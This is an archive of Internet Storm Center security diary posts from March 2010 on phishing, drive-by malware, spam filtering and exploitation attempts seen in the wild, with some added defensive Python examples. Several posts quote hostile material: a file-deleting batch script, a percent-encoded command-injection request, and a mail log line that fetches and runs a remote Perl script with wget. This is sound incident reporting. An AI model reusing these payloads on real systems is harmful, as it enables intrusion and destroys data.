"Copyright Lawsuit filed against you"

Overview

An email is being sent out warning the recipient of a "Copyright Lawsuit filed against you."  We received a copy here, and a number of .EDUs have reported its receipt.  It looks something like:

March 24, 2010
Crosby & Higgins
350 Broadway, Suite 300
New York, NY 10013

To Whom It May Concern:

On the link bellow is a copy of the lawsuit that we filed against you in court on March 11, 2010.
Currently the Pretrail Conference is scheduled for April 11th, 2010 at 10:30 A.M. in courtroom #36.
The case number is 3485934. The reason the lawsuit was filed was due to a completely inadequate response from your company for copyright infrigement that our client Touchstone Advisories Inc is a victim of Copyright infrigement
hXXp://www.touchstoneadvisorsonline.com/lawsuit/suit_documents.doc
Touchstone Advisories Inc has proof of multiple Copyright Law violations that they wish to present in court on April 11th, 2010.

Sincerely,

Mark R. Crosby
Crosby & Higgins LLP

The law-firms named in the email, header, and sending server all appear to be a mish-mash of existing firms.

If a user clicks on the link and opens the document it will attempt to download additional payload.

Initial Detection

Currently only a few AV solutions detect the initial document: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269486837

Behavioral Notes

Following Daniel's process (http://isc.sans.org/diary.html?storyid=6703) one could extract the executable and determine what it's up to.

It appears to reach out to 121.14.149.132:80 to make a request similar to:

GET /fwq/indux.php?U=1234@1014@1@0@0@c791d4a4a147b2cd1843fe4f7f27f3a1df63f95daf0c3ddcd5f1b1e4538fd803

 

5 Comments

Published: 2010-03-24

Cisco security updates

Cisco released 7 new security updates to various different products today.  More information at their site: http://ww.cisco.com/en/US/products/products_security_advisories_listing.html

-Kyle Haugsness

0 Comments

Published: 2010-03-24

Wax nostalgic - commodore64 updated to present time

Slow news/incidents day.... So I will post something slightly off-topic.  Yes, the story was on Slashdot and it may never come to fruition (or even be suitably priced), but the news that Commodore USA was releasing a new PC embedded into a keyboard had me reminiscing of my first computer, the commodore64.  New site here: http://www.commodoreusa.net

I can't tell you how many times I read "syntax error" in response to my prodding of the BASIC language.  Hmm, how do I make this into a security-related article?  It would be difficult to install a keyboard logger on these things!!  So perhaps it fits into your physical security strategy?  Does anyone conquer physical security threats with creative choices of hardware?  For instance, if you have a policy of no USB flash drives do you enforce that through hardware restrictions?

-Kyle Haugsness

6 Comments

Published: 2010-03-24

".sys" Directories Delivering Driveby Downloads

Our reader Paul observed malware being delivered from the ".sys" directory of various web sites. The URL follows the scheme:

http://evilexample.com/.sys/?action=....

When the link is clicked, the user is asked to install the software. According to Paul, he observed the link being delivered via Facebook, which of course makes the message more plausible, and it is likely that users install the software thinking it came from a "Friend". Before adding a specific block for ".sys", Paul's web filter caught about 60% of these exploits.

Once a user follows the link, additional exe files are downloaded from ".sys" directories. The file names Paul observed are p.exe, go.exe and v2captcha21.exe.


------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

7 Comments

Published: 2010-03-23

The Top 10 Riskiest US Cities for Cybercrime

A study by Symantec's Security Response Group and Sperling's BestPlaces was published that indicated the top 10 riskiest US cities for being a victim of cybercrime. The study does have some assumptions that all might not agree with but one of the key points is that the prevalence of "free wi-fi" is a risk factor for cybercrime.

If you think about it, the one thing that makes electronic crime appealing is that it can be done anonymously with few fingerprints. A few years ago I was trying to convince an information security officer at a public institution that there were threats with free wireless internet that he was not addressing.  To demonstrate, I associated myself with the access point and then sniffed all the traffic back and forth. I saw IM conversations, GMail (which by default is all over HTTP but can be forced to HTTPS), Facebook, etc.  Sadly, convenience trumped security (even the few security measures that could have been used at the time and still allow convenience).

Another aspect is that free wireless is an attractive resource for those who want to be anonymous. If you wanted to commit online crime, what better place than a public wireless hotspot with hundreds of people using them that is wide open? For instance, what was believed to be the first arrest for theft of wireless service was an individual who was using an unprotected residential wireless access point to download child pornography from his vehicle in the street.

What does this mean for you? If you are using a public wi-fi hotspot, don't do anything you would mind other people snooping in on or fire up the corporate VPN before you do anything. If you want to shop online, you might want to consider doing that at home. And if you operate a public wi-fi hotspot, track and log all MACs that access your network and monitor outbound traffic for malicious use. 

--
John Bambenek
bambenek at gmail /dot/ com

2 Comments

Published: 2010-03-21

Responding To The Unexpected

We all know that having an Incident Response plan in place helps to minimize the damage caused by a security incident.

We also know that not everyone has one.

I was fortunate to attend fellow handler Lenny Zeltser's talk on "How To Respond To An Unexpected Security Event"  at SANS 2010 in Orlando earlier this month.

If you don't have an IR plan in place, take a look at his presentation, which is available in pdf form on his web site.

 

Christopher Carboni - Handler On Duty

0 Comments

Published: 2010-03-21

Skipfish - Web Application Security Tool

Michal Zalewski (lcamtuf), a Polish security researcher and author of many tools and books, is at it again.  On Friday, he released a fully automated, active web application security tool known as skipfish.  It gives developers and security professionals a solid reconnaissance tool which scans at high speed, is easy to use, and has a number of different security checks with limited false positives.  In my particular environment, we are extremely budget poor (taking a second round of budget cuts with under 6 months left in the fiscal year is bad, and I know others have it worse than we do).  So the possibility of increasing my tool set without spending a lot of money sits very well with our administration. From my initial testing yesterday, it did detect a few issues within a sample website which had not been detected before. So in my book, this is a great plus.

The tool is under the Apache 2.0 license and is located at http://code.google.com/p/skipfish/ .  I see that there have been a number of changes today to correct a number of issues since it was initially released yesterday.  I expect that this tool will be much more stable within the next few days.

Scott Fendley ISC Handler

2 Comments

Published: 2010-03-20

BitDefender 2010 Update Problem

We have started to receive reports this morning concerning a popular consumer antivirus product that has caused some grief today.  BitDefender 2010 appears to have released a set of bad definitions.  Unfortunately, these bad virus definitions appear to detect core DLL files, and even parts of BitDefender itself, as infected by "Trojan.FakeAlert.5".  There is quite a thread discussing this issue on the BitDefender Forums.

If you or your organization uses BitDefender, I would strongly recommend that you disable auto-update of the definitions until corrected ones are released.  Also, I would recommend preparing to do a lot of hands-on clean up to restore the files which were quarantined by accident.

Scott Fendley ISC Handler

0 Comments

Published: 2010-03-20

Firefox 3.6.2 to be released March 30

In the past month, there has been a lot of discussion about an unpatched security vulnerability in Firefox 3.6.  Unfortunately, very limited information was released on the vulnerability, and much of the discussion revolved around whether the reports were real or just FUD.  Mozilla eventually received enough information to reproduce the problem and posted an advisory late on 3/18/2010 (yes, I know that I missed this being released yesterday, and I blame the NCAA tourney for that).

In any case, Firefox 3.6.2 is scheduled for release on March 30, but the beta build is available from their nightly candidate area.  More information is available on the Mozilla Security Blog. Please schedule some time to test this version and get it into your update pipeline for user workstations.

Scott Fendley ISC Handler

1 Comments

Published: 2010-03-19

I Know What Your Office Equipment Did Last Summer...

Yesterday there was a great article in the Toronto Star that discusses a potential security risk that may not be obvious to some business owners.  You can find that article here.

G.N. White
ISC Handler on Duty
 

1 Comments

Published: 2010-03-18

Dangers of copy&paste

One of our readers, Bill, wrote in to let us know about a pretty dangerous batch script that was posted on a web site he visited. The script is supposed to help users get rid of print jobs which are still in the spooler, but it contains a couple of obvious errors. I am pasting the original, as it was on the web site, below (of course, do not run this):

@echo off
echo Stopping print spooler.
echo.
net stop spooler
echo deleting stuff... where? I'm not sure. Just deleting stuff.
echo.
FOR %%A IN (%systemroot%  system32  spool  printers     *.*) DO DEL %%A
echo Starting print spooler.
echo.
net start spooler

The script is, as you can see, very simple – all it does is stop the print spooler (the spooler service) and then it is supposed to delete all files in the %systemroot%\system32\spool\printers directory. Unfortunately, the author (accidentally?) added a couple of white spaces, so this script became extremely dangerous: it will try to delete all files in the %systemroot% directory, in C: and in the current directory.

This simple error shows how dangerous it can be to just blindly copy&paste stuff off the Internet and run it in your environment. While in this case it was easy to spot the error since the whole script is only 10 lines long, in other cases we should be very careful.

I also noticed another thing that is very popular today – in order to download stuff off the Internet faster (legal stuff, such as Linux distributions), people tend to use a lot of different utilities that are supposed to provide faster download speeds. Such utilities can be simple BitTorrent clients or dubious utilities that will download unverified things from even more dubious web sites. And this leads me to a question: how many of you verify the integrity of the files you download? It would be interesting to compare the number of downloaded ISO images of popular Linux distributions with the number of downloaded checksum files – I fear that less than 1% of people verify what they download. I hope in time this number will increase!
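The verification step asked for above, as an added example (this is not code from the diary): parse a sha256sum-style checksum file, hash the download in chunks so a multi-gigabyte ISO never has to fit in memory, and compare digests. The demo builds a constructed "ISO" and checksum file in a temporary directory, verifies it, then flips one byte and verifies again. File names and contents are made up for the demonstration.

```python
import hashlib
import hmac
import os
import tempfile


def parse_checksum_file(text):
    """Parse sha256sum/md5sum style lines ('<hexdigest>  <filename>') into
    {filename: hexdigest}. Blank lines and '#' comments are skipped; a leading
    '*' on the filename (the GNU coreutils binary-mode marker) is dropped."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip()
        if name.startswith("*"):
            name = name[1:]
        if digest and name:
            expected[name] = digest.lower()
    return expected


def file_digest(path, algorithm="sha256", chunk_size=1 << 20):
    """Hash a file in 1 MiB chunks; works for images far larger than RAM."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path, checksum_text, algorithm="sha256"):
    """True only if the file's digest equals the checksum-file entry for its basename.
    A missing entry raises KeyError rather than returning False, so 'no entry'
    can never be confused with 'verified'."""
    expected = parse_checksum_file(checksum_text)
    name = os.path.basename(path)
    if name not in expected:
        raise KeyError(f"no checksum entry for {name}")
    # compare_digest runs in constant time regardless of where the strings differ.
    return hmac.compare_digest(file_digest(path, algorithm), expected[name])


def demo():
    """Constructed image + checksum file in a temp dir. Returns (ok_before, ok_after)
    where ok_after is the result after one byte of the image has been changed."""
    with tempfile.TemporaryDirectory() as tmp:
        iso = os.path.join(tmp, "distro-1.0.iso")  # hypothetical file name
        with open(iso, "wb") as fh:
            fh.write(b"\x00" * 1024 + b"constructed image payload" + b"\xff" * 1024)
        checksum_text = f"# constructed SHA256SUMS\n{file_digest(iso)}  distro-1.0.iso\n"
        ok_before = verify_download(iso, checksum_text)
        with open(iso, "r+b") as fh:  # corrupt a single byte in the middle
            fh.seek(1030)
            fh.write(b"X")
        ok_after = verify_download(iso, checksum_text)
    return ok_before, ok_after


if __name__ == "__main__":
    print(demo())  # (True, False)
```

A checksum file fetched from the same mirror as the image only detects corruption or tampering on that one path; a mirror compromise would replace both. Distributions therefore sign the checksum file with their release key, and checking that signature is the step that actually anchors the verification.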

--
Bojan

 

5 Comments

Published: 2010-03-17

Spam was killing us! Here is what we did to help!

 

I work for a smallish ISP in the Midwest.  In late September and the month of October we began getting blasted with spam and DHAs from all over the world.  We had been utilizing a spam filtering service but it was not keeping up. We billed the customers for the service and they were starting to complain. They were getting so much spam in their inboxes that they felt like they were wasting their money.  In October, when the problem became so bad that it started affecting our mail server's ability to process mail any longer, we knew we had to do something.  We had been "test driving" a spam filter device by Red Condor.  The accounts that had been moved over to the Red Condor filter were virtually spam free. We decided to implement the Red Condor solution across the board on the server that was being hammered the worst.  This server has just over 9,000 accounts on it.  We turned up the Red Condor box at about 4pm and by 7:00am the next morning the quarantine boxes had been created for all customers.  No interaction required, it simply verified each inbox as the emails arrived for the account.  If the account did not exist it threw the spam away, if the account did exist it created the inbox and then determined whether the email was spam or was legit (autodiscover does not work with Exchange Servers).

We decided to "give the service away" as part of the customers' Internet service.  In reality we have been the ones to benefit from the service.  The mail server has been purring along for months now and our customers are much happier.  They literally have had no spam hit their inboxes.  We have been in the learn mode for a while and slowly started migrating other customers over to the device.  It has not missed a hit.  The other thing that is amazing is the ease in setting up the "accounts" on Red Condor.  With the previous service it was about a 15 minute process to set up each domain.  It was a series of long drawn out steps to set up the accounts.  With Red Condor it takes less than a minute to set up a new account/domain.  If I can use autodiscover to create the inboxes then the setup task is done.  Change the MX record and I am good to go.

Now here is the amazing part.  The reporting available with the product is unbelievable.  At a glance I can see just how much work this single device is doing.  Here is a report for the domain that has just over 9,000 accounts.  This is a summary of the transactions handled for the domain since March 1, 2010.   You see that out of almost 20 million emails handled only 713,222 (3.6%) were actually delivered.

March 2010: disposition counts by category

Category             Deliver   Markup   Quarantine       Block        Total  % total      Size   % size
OK                   638,116                                       638,116     3.2%     108GB    32.1%
Unprotected            2,905                                         2,905     0.0%      60MB     0.0%
Friends               72,201                                        72,201     0.4%      17GB     5.2%
Enemies                                         176                    176     0.0%      31MB     0.0%
Virus                                                   55,587      55,587     0.3%   7,109MB     2.1%
Phish                                       434,661      2,218     436,879     2.2%   1,165MB     0.3%
Keyword                                                                  0     0.0%         0     0.0%
Adult                                                  106,296     106,296     0.5%     270MB     0.1%
Spam                             919     13,412,089     42,939  13,455,947    68.1%     154GB    45.9%
Junk                           1,718        349,796        697     352,211     1.8%   9,223MB     2.7%
Blank                                           489          2         491     0.0%   1,073KB     0.0%
Foreign                                      12,707         33      12,740     0.1%     159MB     0.0%
Risky Attachment                                 16                     16     0.0%      18MB     0.0%
Unresolved Sender                                                        0     0.0%         0     0.0%
Invalid Recipient                                    4,623,107   4,623,107    23.4%      38GB    11.3%
Total                713,222   2,637     14,209,934  4,830,879  19,756,672              335GB
% of total              3.6%    0.0%          71.9%      24.5%


It isn't hard to understand now why my poor mail server was weeping on a daily basis.  We are now in the process of moving the remaining customers, accounts and domains over to the Red Condor system.  

Spam and viruses have become such a big problem for ISPs worldwide.  Until we can clean up the infected machines that are generating this spam and shut down the bad guys that are pushing this garbage at us, it is good to know that these types of systems exist.

I would like to hear from our readers.  What has helped your organization deal with spam and the pr

14 Comments

Published: 2010-03-17

Trojan outbreak on a College Campus

One of our readers just advised us that the college that he is associated with has had a major outbreak of  Trojan.Win32.Scar.bwgf (Kaspersky).  Michael reported:

"We are now in major clean up mode.  All the file servers have been removed from the network to prevent further spread.

Basically the virus hides all the files in a directory and the directory itself.  It then adds a file of 74K with the same name as the file with a .exe.  So a user wishing to open their word document would actually be infecting themselves with the virus."

Michael asked if we had received any other reports of infection from this Trojan.  A quick look on Google shows that some variation of this has been around for a while.  It looks like his campus may be dealing with an updated version.
 

If anyone else is seeing any activity for this Trojan give us a shout.  Thanks Michael for reporting this to us.
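A triage script for the pattern Michael describes (a hidden original next to an executable carrying its name), as an added example that is not part of the diary or of his report. It walks a tree, flags every *.exe whose name matches a non-executable sibling with or without the original extension (report.doc next to report.doc.exe or report.exe), and records whether the shadowed file carries the Windows hidden attribute and how large the executable is, so that 74K decoys stand out. The directory layout in the demo is constructed; the dot-file fallback on non-Windows systems is an approximation so the example runs anywhere.

```python
import os
import tempfile

FILE_ATTRIBUTE_HIDDEN = 0x2  # Windows file attribute bit


def is_hidden(path):
    """Windows: test the hidden attribute bit. Elsewhere (no st_file_attributes)
    fall back to the dot-file convention, which is only an approximation."""
    attrs = getattr(os.stat(path), "st_file_attributes", None)
    if attrs is not None:
        return bool(attrs & FILE_ATTRIBUTE_HIDDEN)
    return os.path.basename(path).startswith(".")


def find_decoy_executables(root):
    """Return (exe_path, shadowed_path, shadowed_is_hidden, exe_size) for every *.exe
    whose name, with or without the original extension, matches a non-executable
    file in the same directory."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        lower_to_name = {n.lower(): n for n in filenames}
        for name in filenames:
            lower = name.lower()
            if not lower.endswith(".exe"):
                continue
            stem = lower[:-4]  # 'report.doc.exe' -> 'report.doc'; 'report.exe' -> 'report'
            for other_lower, other in lower_to_name.items():
                if other_lower == lower or other_lower.endswith(".exe"):
                    continue
                other_stem = other_lower.rsplit(".", 1)[0]
                if other_lower == stem or other_stem == stem:
                    exe_path = os.path.join(dirpath, name)
                    shadowed = os.path.join(dirpath, other)
                    findings.append((exe_path, shadowed, is_hidden(shadowed),
                                     os.path.getsize(exe_path)))
    return findings


def demo():
    """Build a constructed share in a temp dir and return the (exe, shadowed)
    basename pairs the scan reports, sorted."""
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "share")
        os.makedirs(share)
        for fname, size in [("report.doc", 4096), ("report.doc.exe", 74 * 1024),
                            ("budget.xlsx", 8192), ("budget.exe", 74 * 1024),
                            ("setup.exe", 300 * 1024), ("readme.txt", 512)]:
            with open(os.path.join(share, fname), "wb") as fh:
                fh.write(b"\x00" * size)
        found = find_decoy_executables(tmp)
    return sorted((os.path.basename(e), os.path.basename(s)) for e, s, _, _ in found)


if __name__ == "__main__":
    for exe, shadowed, hidden, size in find_decoy_executables("."):
        print(f"{exe}\tshadows {shadowed}\thidden={hidden}\tsize={size}")
```

The name match alone produces false positives (setup.exe beside setup.ini is normal), which is why the hidden flag and the size are returned with each hit: a hidden original plus an executable of a constant size across many directories is the signature worth acting on, and the list of shadowed paths doubles as the inventory of files to unhide during clean up.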

 

Deb Hale Long Lines, LLC

6 Comments

Published: 2010-03-16

Internet Explorer 9 "Platform Preview" Now Available From Microsoft

Microsoft released a "Platform Preview" version of the next version of Internet Explorer. You can download it from http://ie.microsoft.com/testdrive/Default.html. There are several security implications of this release:

  1. Security professionals may be interested in exploring what security features and enhancements (if any) are built into Internet Explorer 9
  2. Attackers may be interested in exploring what vulnerabilities (if any) exist in the code added to Internet Explorer 9
  3. Attackers may start using the lure of installing Internet Explorer 9 as part of phishing and drive-by campaigns

Regarding point #3... At the moment, searching for "Internet Explorer 9" doesn't provide many links that look malicious. I suspect this will change as malicious sites using Search Engine Optimization (SEO) techniques will spring into action to take advantage of people's interest in the new browser.

Have you had a chance to look at Internet Explorer 9? Let us know your security-related observations.

-- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

0 Comments

Published: 2010-03-16

Trouble Ticket Express Exploit in the Wild a Day After the Vulnerability Announcement

The time between the announcement of a vulnerability and seeing the exploit in the wild is short, especially if the announcement includes proof-of-concept code. A day ago, a proof-of-concept exploit in Trouble Ticket Express help desk software was made public. Just a day later, ISC reader Ben saw the exploit in the wild:

64.15.159.171 - - [15/Mar/2010:18:42:23 -0700] "GET /ttx.cgi?cmd=file&fn=%7C%65%63%68%6F%20%2D%6E%20%62%75%66%75%77%75%7A%68%65%72%3B%65%63%68%6F%20%65%7C HTTP/1.1" 403 960 "-" "Plesk"

The decoded version of this particular URI is:

/ttx.cgi?cmd=file&fn=|echo%20-n%20bufuwuzher;echo%20e|

The targeted vulnerability in the application could allow the attacker to execute arbitrary code on the system.

If you are running Trouble Ticket Express version 3.01 or lower, update the program's File Module or disable access to the TTXFile.pm module on your server.

 -- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

1 Comments

Published: 2010-03-15

Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears the bad guys have started to actively exploit the SpamAssassin milter vulnerability that was published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.
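Both of the attempts above, the Trouble Ticket Express request and the SpamAssassin milter recipient, inject shell metacharacters into a field that the vulnerable software hands to a shell: a pipe character at the start and end of a file-name parameter in one case, and a pipe in the local part of a recipient address in the other. The following is an added example (not code from either diary) that decodes such fields and flags them. The access-log regex is a constructed Apache/nginx combined-log matcher; the sample log contains the request Ben reported plus one constructed benign request for contrast, and the recipient sample uses a placeholder host.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that hand control to a shell when a value reaches open()/system():
# pipe, command separator, backtick, variable expansion, redirection.
SHELL_META_RE = re.compile(r"[|;`$<>]")

# Apache/nginx combined-log line shape (constructed, not from the diary).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# First line: the request reported in the diary. Second line: constructed benign request.
SAMPLE_ACCESS_LOG = """\
64.15.159.171 - - [15/Mar/2010:18:42:23 -0700] "GET /ttx.cgi?cmd=file&fn=%7C%65%63%68%6F%20%2D%6E%20%62%75%66%75%77%75%7A%68%65%72%3B%65%63%68%6F%20%65%7C HTTP/1.1" 403 960 "-" "Plesk"
192.0.2.10 - - [15/Mar/2010:18:43:01 -0700] "GET /ttx.cgi?cmd=file&fn=report.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def decode_query(uri):
    """Split the query on '&' *before* percent-decoding, so an encoded %26 or %3B
    inside a value is never mistaken for a separator. Returns {name: value}."""
    params = {}
    for pair in urlsplit(uri).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def suspicious_params(uri):
    """Decoded query parameters whose value contains shell metacharacters."""
    return {k: v for k, v in decode_query(uri).items() if SHELL_META_RE.search(v)}


def scan_access_log(text):
    """(client_ip, status, {param: decoded_value}) for each request that carries
    shell metacharacters in a query parameter. The status is kept because a 403,
    as in Ben's log, shows the attempt was refused."""
    hits = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        bad = suspicious_params(m.group("uri"))
        if bad:
            hits.append((m.group("ip"), int(m.group("status")), bad))
    return hits


def suspicious_recipient(address):
    """True when the local part of an SMTP recipient (the part a milter or local
    delivery agent may pass to a shell) contains shell metacharacters."""
    local_part = address.rsplit("@", 1)[0]
    return bool(SHELL_META_RE.search(local_part))


if __name__ == "__main__":
    for ip, status, bad in scan_access_log(SAMPLE_ACCESS_LOG):
        print(ip, status, bad)
    print(suspicious_recipient("root+:|wget hxxp://attacker.invalid/p.txt"))  # placeholder host
```

Matching on the decoded value is the point: the raw URI in Ben's log shows only percent-escapes, and a signature written against the literal `%7C` would miss the same payload encoded a different way. Plus-addressing (`user+tag@`) is legitimate, so the check looks only for metacharacters, not for the `+` itself.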

Cheers,
Adrien de Beaupré
EWA-Canada.com

 

4 Comments

Published: 2010-03-14

DST Issue in Windows 7 Ultimate?

One of our readers reported that his copy of Windows 7 Ultimate failed to update itself overnight with the change to Daylight Saving Time.  We have not had any other reports of this, but are curious if any readers have seen any DST difficulties with Windows 7.  It may have been a local configuration error, but it's always good to ask around for other observations.

Thanks for the note Ramu.

Marcus H. Sachs
Director, SANS Internet Storm Center

9 Comments

Published: 2010-03-13

Evil Sports Sites

One of our regular readers submitted a Google query to us that points to yet another temptation that the criminals are taking advantage of - the March Madness basketball tournaments here in the USA.  I'm sure that other sporting events are just as popular with the scammers and crooks.  If you want to check out the fun, put this into your browser:

http://www.google.com/search?q=big+ten+tournament+2010+wiki

We trust that you are not crazy enough to click on the links that Google marks as hazardous to your computer's health, but if you do and you net something really cool that you'd like to analyze, please let us know what you uncover.  Use the comment feature below or send us a note via our contact form.

Thanks Melvin for the info!

Marcus H. Sachs
Director, SANS Internet Storm Center

1 Comments

Published: 2010-03-11

Interesting SKYPE SPIM.

Earlier this week Jared sent us an interesting SKYPE spim. I suspect this was sent using the Skype IMbot discussed in the previous diary.
This one was a social engineering attempt to get the recipient to load scareware or fakeAV. Like most of these sites it had some java that is intended to simulate an antivirus scan. The scan is free of course. Everyone that gets "scanned" by this junk is infected. Getting cleaned of your viruses costs, since you have to buy the commercial version to "clean" your infection. They have nice little functions like "hideActiveXDialog" and "doUpdatePercents", which simply counts off ticks to make it appear they are scanning the system. Then they throw up a banner2.jpg which is a warning that you have a bunch of scary viruses including "System Soap Pro", AntiLamer Light, MC 30 day, SoftEther, I-Worm.NetSky.q, I-Worm.Bagle.n, Tofger-A, Zinx-A, B-S Spy 1.90 and KrAIMer 1.1.

Some of those names are known malware; others appear to have been made up to insult anyone that gets this message. Who came up with System Soap, AntiLamer, SoftEther or BS spy? Here is the text that was sent out to entice victims to pay for this LAME fake AV.

WINDOWS REQUIRES IMMEDIATE ATTENTION
URGENT SYSTEM SCAN NOTIFICATION ! PLEASE READ CAREFULLY !!

hxxp://www.onlineck.org

For the link to become active, please click on 'Add to
contacts' skype button or type it in manually into your web browser !

FULL DETAILS OF SCAN RESULT BELOW
****************************************

WINDOWS REQUIRES IMMEDIATE ATTENTION

ATTENTION ! Security Center has detected
malware on your computer !

Affected Software:

Microsoft Windows Vista
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows Server 2003

Impact of Vulnerability: Remote Code Execution / Virus Infection /
Unexpected shutdowns
 
Recommendation: Users running vulnerable version should
install a repair utility immediately

Your system IS affected, download the patch from the address below !
Failure to do so may result in severe computer malfunction.

http://www.onlineck.org/
 
For the link to become active, please click on 'Add to
contacts' skype button or type it in manually into your web browser!”


 

0 Comments

Published: 2010-03-11

Cert write up on Skype IMBot Logic and Functionality.

CERT.at has provided a good technical analysis of a Skype IMBot.
The authors, Christian Wojner and L. Aaron Kaplan, did a good job analysing this IMBot.
They also "swapped notes" with Aaron Hackworth of secureworks.com. Such public/private collaboration I find to be very encouraging.

This is a fairly new vector. I have seen other IM based malware using Skype IM, so it's not brand new, but not too common yet either. The malware detects many reverse engineering applications and attempts to make the system unbootable if any type of RE is detected. It uses a new (novel) method to hide its processes/files. It scans local networks for TCP port 445, probably to exploit one of the many Microsoft vulnerabilities that can be exploited via that service. It uses "Conficker like" encryption. It had logic to "infect" USB drives.

I really enjoyed this analysis as it included some interesting approaches and pointed to functionality that appeared to be in the bot but they were unable to trigger within their RE environment.
http://cert.at/static/downloads/papers/cert.at-an_analysis_of_the_skype_imbot_logic_and_functionality_1.2.pdf
 

0 Comments

Published: 2010-03-10

Microsoft re-release of KB973811 - attacks on Extended Protection for Authentication

Yesterday Microsoft re-released KB973811 ==> http://www.microsoft.com/technet/security/advisory/973811.mspx

This relates back to the original KB973917 ==> http://support.microsoft.com/kb/973917

and advisory MS09-071 ==> http://www.microsoft.com/technet/security/bulletin/ms09-071.mspx

This affects the Extended Protection for Authentication functions within XP, Vista and Server 2003 ==> http://support.microsoft.com/kb/968389

It didn't show up in yesterday's Patch Tuesday review because Microsoft is classifying it as a "non-security upgrade". This is confusing to me, because the update actually includes mitigation against a credential forwarding attack, which you might see on an unencrypted, unsigned connection (yes, there's still a lot of that going around ! )

This update affects XP, Vista and Server 2003.  Windows 7 and Server 2008 R2 are not affected.

Thanks to our readers on letting us know about this one.  I'm still puzzled as to why this wasn't on Microsoft's list of security updates ...

=============== Rob VandenBrink Metafore ===============

2 Comments

Published: 2010-03-10

Microsoft Security Advisory 981374 - Remote Code Execution Vulnerability for IE6 and IE7

Several readers have pointed us towards this advisory.  This Microsoft advisory outlines a vulnerability in Internet Explorer 6 and 7, which could allow remote code execution.  While there are some mitigations available for IE7 (the Enhanced Security Mode) in Server 2003 and Server 2008, the best advice is to upgrade to Internet Explorer 8, which is not vulnerable.

Find the advisory here ==>  http://www.microsoft.com/technet/security/advisory/981374.mspx

=============== Rob VandenBrink, Metafore ==============

1 Comments

Published: 2010-03-10

What's My Firewall Telling Me? (Part 4)

There’s been a lot of discussion about the recent stories on parsing firewall logs  - Mark’s story at http://isc.sans.org/diary.html?storyid=8293 , Daniel’s story at http://isc.sans.org/diary.html?storyid=8347 ,  and Kyle’s at http://isc.sans.org/diary.html?storyid=8362  have covered a number of methods and tools for plumbing the depths of your firewall logs. 

In these stories, it’s been stressed that there’s gold in them there logs!  Reviewing your logs is legally required under several regulatory frameworks, and just plain makes sense – reviewing inbound and outbound traffic is an excellent way to find stuff being sent or received that shouldn’t be happening, finding malware or finding violations of corporate policies.

But, you say, that's all great, but many firewall logs are over 500MB per day, and if you're not a command line guru with grep, uniq, sort, awk or perl, what do you do?  Or what if the firewall log output is just so much scrambled eggs to you? How are you supposed to plow through all that text and data for the few pearls that you can expect to find that might indicate a problem?  For me, the answer is easy: use tools that summarize Netflow data.  Netflow is a facility that is available on many network devices that examines all the traffic through the device interfaces, and summarizes it by source and destination IP address, as well as source and destination port and how much data was sent or received.  It then sends this summarized data to a server application called a Netflow Collector.  Netflow is generally associated with Cisco gear, but there is an RFC equivalent in sFlow (RFC 3176) that is implemented by many other vendors, or a Juniper specific version in jFlow.

Continuing on, the Netflow collector then stashes this data into a database, and then gives you a nice web front-end to the data, allowing you to slice and dice the addresses and associated values in prepackaged reports, or do ad-hoc queries.  So if you want to see why internet bandwidth was maxed out last Tuesday over lunch, who the culprit was and what they were doing, it’s a piece of easy!

It sounds complicated, but in practice it’s generally about 4-5 lines of config on the device (router, switch or firewall - check your documentation for specifics), and a GUI setup on the server.  There are lots of Netflow Collector apps out there, I won’t start the religious war of stating that one is better than another – I use any one of 7 or 8 different ones, depending on which client I’m working with that day.

Let’s take a look at a typical “let’s review the firewall activity” session that you might have as part of your daily routine.  This data is from a client site where I set Netflow up last week, I was going through an orientation session with the client IT Team (which is also the Incident Handling team at this organization), as well as using the tool in response to widespread user complaints about internet performance issues.

Let’s start at the TCP applications (aka sort data by TCP destination port) screen – in this example we’re just looking at the data from the last hour, for the inside interface of the firewall.


 
On the face of it, all looks well, all the usual suspects are there, but let’s dig a bit deeper – let’s take a closer look at SMTP.


 


The SMTP traffic looks pretty much as we expected – lots and lots of mail being sent from the mail server ( 10.0.0.73 ).  But hey – what’s that station 10.0.0.233? - should there be another SMTP sender?  After some digging, it turns out we had a workstation using a personal POP/SMTP email client from work – this was a clear violation of the Acceptable Use Policy at this organization.

Let’s go back to the main screen, and dig into the “TCP_App” section, which is the "bit bucket" that this particular Netflow application puts things into when it doesn’t recognize what the target tcp port is.



